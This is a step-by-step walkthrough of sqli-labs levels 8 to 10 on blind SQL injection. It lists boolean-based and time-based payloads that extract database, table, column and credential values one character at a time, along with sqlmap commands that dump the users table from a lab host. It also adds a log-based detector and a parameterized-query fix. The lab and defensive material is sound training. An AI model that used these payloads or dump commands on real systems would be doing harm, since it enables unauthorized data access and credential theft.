5.8. Level 8: GET boolean-based blind injection
5.8.1. Manual injection
(1) Determine the injection type
?id=1' and 1=1--+  page shows You are in...........
?id=1' and 1=2--+  blank page
String-type (single-quote delimited) injection
(2) Determine the number of columns
?id=1' order by 3--+  page shows You are in...........
?id=1' order by 4--+  blank page
There are 3 columns
(3) Guess the length of the database name
Nothing from the query is echoed back, so use boolean-based blind injection: the only signal is whether the page shows You are in........... (condition true) or is blank (condition false)
?id=1' and length(database())>1--+  page shows You are in...........
?id=1' and length(database())>10--+  blank page
?id=1' and length(database())>5--+  page shows You are in...........
?id=1' and length(database())=8--+  page shows You are in...........
length() returns the length of a string
The database name is 8 characters long
(4) Use ascii() to guess the database name
substr(string, start, length) extracts a substring:
  string is the string to process
  start is the starting position (counting from 1)
  length is the number of characters to take
ascii() returns the ASCII code of a character
Uppercase letters: 65 (A) to 90 (Z), consecutive with no gaps
Lowercase letters: 97 (a) to 122 (z), consecutive with no gaps; lowercase minus uppercase = 32
ASCII values of the 26 lowercase letters (subtract 32 for uppercase):
a 97   h 104   o 111   v 118
b 98   i 105   p 112   w 119
c 99   j 106   q 113   x 120
d 100  k 107   r 114   y 121
e 101  l 108   s 115   z 122
f 102  m 109   t 116
g 103  n 110   u 117
?id=1' and (ascii(substr(database(),1,1)))>100--+  normal response
?id=1' and (ascii(substr(database(),1,1)))>200--+  blank
?id=1' and (ascii(substr(database(),1,1)))>150--+  blank
?id=1' and (ascii(substr(database(),1,1)))>125--+  blank
?id=1' and (ascii(substr(database(),1,1)))>112--+  normal response
?id=1' and (ascii(substr(database(),1,1)))>120--+  blank
?id=1' and (ascii(substr(database(),1,1)))>116--+  blank
?id=1' and (ascii(substr(database(),1,1)))=115--+  normal response; the 1st character of the database name is s
?id=1' and (ascii(substr(database(),2,1)))>100--+  normal response
?id=1' and (ascii(substr(database(),2,1)))>200--+  blank
?id=1' and (ascii(substr(database(),2,1)))=101--+  normal response; the 2nd character of the database name is e
?id=1' and (ascii(substr(database(),3,1)))=99--+  normal response; the 3rd character of the database name is c
?id=1' and (ascii(substr(database(),4,1)))=117--+  normal response; the 4th character of the database name is u
?id=1' and (ascii(substr(database(),5,1)))=114--+  normal response; the 5th character of the database name is r
?id=1' and (ascii(substr(database(),6,1)))=105--+  normal response; the 6th character of the database name is i
?id=1' and (ascii(substr(database(),7,1)))=116--+  normal response; the 7th character of the database name is t
?id=1' and (ascii(substr(database(),8,1)))=121--+  normal response; the 8th character of the database name is y
?id=1' and (ascii(substr(database(),9,1)))>96--+  blank, confirming there is no 9th character
The database name is security
Speechless. It can be done, but it is so slow and such a hassle.
(5) Use ascii() to guess table names
1st character of the 1st table's name
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))>110--+
That is, database() is replaced by select table_name from information_schema.tables where table_schema='security' limit 0,1
The inner number, x in limit x,1, selects table number x+1; the outer number, y in substr(A,y,1), selects the y-th character of that table's name
The inner index x counts from 0, the outer index y counts from 1
1st character of the 4th table's name
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))>110--+  normal response
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))>115--+  normal response
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))>118--+  blank
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))=117--+  normal response, u
2nd character of the 4th table's name
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),2,1)))=115--+  normal response, s
3rd character of the 4th table's name
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),3,1)))=101--+  normal response, e
4th character of the 4th table's name
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),4,1)))=114--+  normal response, r
5th character of the 4th table's name
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),5,1)))=115--+  normal response, s
The 4th table is named users
Just know that this method exists; it is far too tedious, how would you ever use it in practice, it takes an absurd amount of time.
(6) Use ascii() to guess column names
1st character of the 1st column of the users table
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)))>110--+  blank
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)))>100--+  normal response
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)))=105--+  normal response, i
2nd character of the 1st column of the users table
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),2,1)))=100--+  normal response, d
The 1st column of the users table is id
1st character of the 2nd column of the users table
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1)))=117--+  normal response, u
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),2,1)))=115--+  normal response, s
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),3,1)))=101--+  normal response, e
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),4,1)))=114--+  normal response, r
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),5,1)))=115--+  normal response, s
The 2nd column of the users table is username
In the same way, the 3rd column of the users table is found to be password
(7) Use ascii() to guess usernames and passwords (same ASCII table as in step (4))
Row 1 of the username column in the users table (limit 0,1)
?id=1' and (ascii(substr((select username from users limit 0,1),1,1)))=68--+  normal response, D
?id=1' and (ascii(substr((select username from users limit 0,1),2,1)))=117--+  normal response, u
?id=1' and (ascii(substr((select username from users limit 0,1),3,1)))=109--+  normal response, m
?id=1' and (ascii(substr((select username from users limit 0,1),4,1)))=98--+  normal response, b
Row 8 of the username column in the users table (limit 7,1)
?id=1' and (ascii(substr((select username from users limit 7,1),1,1)))=97--+  normal response, a
?id=1' and (ascii(substr((select username from users limit 7,1),2,1)))=100--+  normal response, d
?id=1' and (ascii(substr((select username from users limit 7,1),3,1)))=109--+  normal response, m
?id=1' and (ascii(substr((select username from users limit 7,1),4,1)))=105--+  normal response, i
?id=1' and (ascii(substr((select username from users limit 7,1),5,1)))=110--+  normal response, n
Row 1 of the password column in the users table (limit 0,1)
?id=1' and (ascii(substr((select password from users limit 0,1),1,1)))=68--+  normal response, D
?id=1' and (ascii(substr((select password from users limit 0,1),2,1)))=117--+  normal response, u
?id=1' and (ascii(substr((select password from users limit 0,1),3,1)))=109--+  normal response, m
?id=1' and (ascii(substr((select password from users limit 0,1),4,1)))=98--+  normal response, b
Row 8 of the password column in the users table (limit 7,1)
?id=1' and (ascii(substr((select password from users limit 7,1),1,1)))=97--+  normal response, a
?id=1' and (ascii(substr((select password from users limit 7,1),2,1)))=100--+  normal response, d
?id=1' and (ascii(substr((select password from users limit 7,1),3,1)))=109--+  normal response, m
?id=1' and (ascii(substr((select password from users limit 7,1),4,1)))=105--+  normal response, i
?id=1' and (ascii(substr((select password from users limit 7,1),5,1)))=110--+  normal response, n
5.8.2. sqlmap automated injection
Same as the previous seven levels
5.9. Level 9: GET time-based blind injection
5.9.1. Manual injection
(1) Determine the injection type and the number of columns
Here the page looks the same whether the condition is true or false; the only signal is whether the response is delayed by the sleep(5) (condition true) or comes back immediately (condition false)
?id=1 and if(1=1,sleep(5),1)--+  response time normal
?id=1' and if(1=1,sleep(5),1)--+  response delayed by 5 s
String-type injection, 3 columns
(2) Guess the length of the database name
?id=1' and if(length(database())>5,sleep(5),1)--+  delayed 5 s
?id=1' and if(length(database())>10,sleep(5),1)--+  no delay
?id=1' and if(length(database())=8,sleep(5),1)--+  delayed 5 s
The database name is 8 characters long
(3) Use ascii() to guess the database name (same ASCII table as in 5.8.1 step (4))
1st character of the database name
?id=1' and if(ascii(substr(database(),1,1))>110,sleep(5),1)--+  delayed 5 s
?id=1' and if(ascii(substr(database(),1,1))>115,sleep(5),1)--+  no delay
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+  delayed 5 s, s
2nd character of the database name
?id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1)--+  delayed 5 s, e
3rd character of the database name
?id=1' and if(ascii(substr(database(),3,1))=99,sleep(5),1)--+  delayed 5 s, c
...
The database name is security
(4) Use ascii() to guess table names (same ASCII table as in 5.8.1 step (4))
1st character of the 4th table in the security database
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(5),1)--+  delayed 5 s, u
2nd character: change the tail to limit 3,1),2,1))
3rd character: limit 3,1),3,1))
4th character: limit 3,1),4,1))
3rd character of the 2nd table: limit 1,1),3,1))
...
The 4th table in the security database is users
(5) Use ascii() to guess column names (same ASCII table as in 5.8.1 step (4))
1st character of the 2nd column of the users table in the security database
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1))=117,sleep(5),1)--+  delayed 5 s, u
username
1st character of the 3rd column of the users table in the security database
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),1,1))=112,sleep(5),1)--+  delayed 5 s, p
password
(6) Use ascii() to guess usernames and passwords
Characters 1 to 5 of row 8 of the username column in the users table of the security database
?id=1' and if(ascii(substr((select username from users limit 7,1),1,1))=97,sleep(5),1)--+  delayed 5 s, a
?id=1' and if(ascii(substr((select username from users limit 7,1),2,1))=100,sleep(5),1)--+  delayed 5 s, d
?id=1' and if(ascii(substr((select username from users limit 7,1),3,1))=109,sleep(5),1)--+  delayed 5 s, m
?id=1' and if(ascii(substr((select username from users limit 7,1),4,1))=105,sleep(5),1)--+  delayed 5 s, i
?id=1' and if(ascii(substr((select username from users limit 7,1),5,1))=110,sleep(5),1)--+  delayed 5 s, n
admin
Characters 1 to 5 of row 8 of the password column in the users table of the security database
admin
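Both the boolean-based probes in 5.8.1 and the time-based probes in 5.9.1 leave a distinctive trail in the web server's access log, which is where a defender would look for them. The following Python is an added detection example, not part of the original notes or of sqli-labs: it URL-decodes each request path, matches the probe shapes used above (and 1=1, order by, length(database()), ascii(substr(...)), information_schema, if(...,sleep(N),1)) and counts probes per source address, since extracting names character by character needs many requests. The log lines, addresses and timestamps are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Probe shapes taken from the walkthroughs above (constructed list, not exhaustive).
BOOLEAN_SIGS = [
    r"\band\s+\d+\s*=\s*\d+",               # and 1=1 / and 1=2
    r"\border\s+by\s+\d+",                  # order by 3
    r"length\s*\(\s*database\s*\(\s*\)",    # length(database())
    r"ascii\s*\(\s*substr\s*\(",            # ascii(substr(...))
    r"information_schema\.(tables|columns)",
]
TIME_SIGS = [r"\bsleep\s*\(\s*\d+", r"\bif\s*\(.*,\s*sleep\s*\("]   # sleep(5), if(c,sleep(5),1)
# Common log format: only the client ip and the request path are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3}')

def classify_request(path):
    """Return 'time', 'boolean' or None for a raw (still URL-encoded) request path."""
    decoded = unquote_plus(path).lower()    # %27 -> ', %3E -> >, trailing --+ -> '-- '
    if any(re.search(p, decoded) for p in TIME_SIGS):
        return "time"
    if any(re.search(p, decoded) for p in BOOLEAN_SIGS):
        return "boolean"
    return None

def scan_log(lines):
    """Count probes per (source ip, kind) over access log lines."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and (kind := classify_request(m.group("path"))):
            hits[(m.group("ip"), kind)] += 1
    return hits

def noisy_sources(hits, threshold=2):
    """IPs whose probe total reaches the threshold: one 8-character name costs
    about 8 * 7 binary-search requests, so volume per source is the key signal."""
    per_ip = Counter()
    for (ip, _), n in hits.items():
        per_ip[ip] += n
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)

# Constructed sample log lines (addresses and timestamps are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs/Less-8/?id=1 HTTP/1.1" 200 720',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs/Less-8/?id=1%27%20and%20length(database())%3E5--+ HTTP/1.1" 200 720',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs/Less-8/?id=1%27%20and%20(ascii(substr(database(),1,1)))%3E100--+ HTTP/1.1" 200 720',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli-labs/Less-9/?id=1%27%20and%20if(length(database())%3E5,sleep(5),1)--+ HTTP/1.1" 200 720',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs/Less-8/?id=2 HTTP/1.1" 200 715',
]
```

Running scan_log(SAMPLE_LOG) yields two boolean probes from 10.0.0.5 and one time probe from 10.0.0.9; the plain ?id=1 and ?id=2 requests are not flagged.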
5.9.2. sqlmap automated injection
Same as the previous eight levels
5.10. Level 10: GET time-based blind injection
5.10.1. Manual injection
Same as Level 9, except that the string is closed with " instead of '; everything else is unchanged
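The reason Level 10 differs from Level 9 only in the closing quote is that the injected value is pasted into a string literal, so the delimiter is the only thing standing between the input and the WHERE clause. The following Python/sqlite3 snippet is an added example, not code from the original notes or from sqli-labs: it contrasts that concatenated lookup with a parameterized one and runs the boolean probes from above through both. The in-memory users table and its two rows are constructed to mirror the lab values seen earlier.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the lab's security.users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (8, "admin", "admin")])
    return conn

def lookup_vulnerable(conn, user_id):
    # The value is pasted into a string literal, so anyone who matches the delimiter
    # (' here, " for Level 10) can append and/if/sleep conditions to the WHERE clause.
    sql = f"SELECT username FROM users WHERE id='{user_id}' LIMIT 1"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def lookup_safe(conn, user_id):
    # Validate the type, then bind it: the value is never parsed as SQL, so there is
    # no delimiter to close and the closing-quote guesswork of Levels 9 and 10 is moot.
    try:
        id_int = int(user_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT username FROM users WHERE id=? LIMIT 1", (id_int,)).fetchone()
    return row[0] if row else None

def probe_results():
    """Run the same inputs through both lookups; the blind probes only work on the first."""
    conn = make_db()
    probes = {
        "plain": "1",
        "true":  "1' and 1=1-- ",     # true condition keeps the row
        "false": "1' and 1=2-- ",     # false condition drops it
        "blind": "1' and substr((select username from users where id=8),1,1)='a'-- ",
    }
    return {name: (lookup_vulnerable(conn, p), lookup_safe(conn, p)) for name, p in probes.items()}
```

For the concatenated lookup the true/false probes toggle the row exactly as the page shows, while the parameterized lookup returns nothing for every probe and still answers a plain numeric id.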
5.10.2. sqlmap automated injection
Compared with the previous nine levels, add -p id --level 3 --risk 3 (-p id restricts testing to the id parameter; --level 3 and --risk 3 widen the set of payloads sqlmap tries)
sqlmap -u "http://192.168.1.64/sqli-labs/Less-10/?id=1" --dbms mysql -v 1 -p id --batch --level 3 --risk 3 --dbs
sqlmap -u "http://192.168.1.64/sqli-labs/Less-10/?id=1" --dbms mysql -v 1 -p id --batch --level 3 --risk 3 -D security --tables
sqlmap -u "http://192.168.1.64/sqli-labs/Less-10/?id=1" --dbms mysql -v 1 -p id --batch --level 3 --risk 3 -D security -T users --columns
sqlmap -u "http://192.168.1.64/sqli-labs/Less-10/?id=1" --dbms mysql -v 1 -p id --batch --level 3 --risk 3 -D security -T users --dump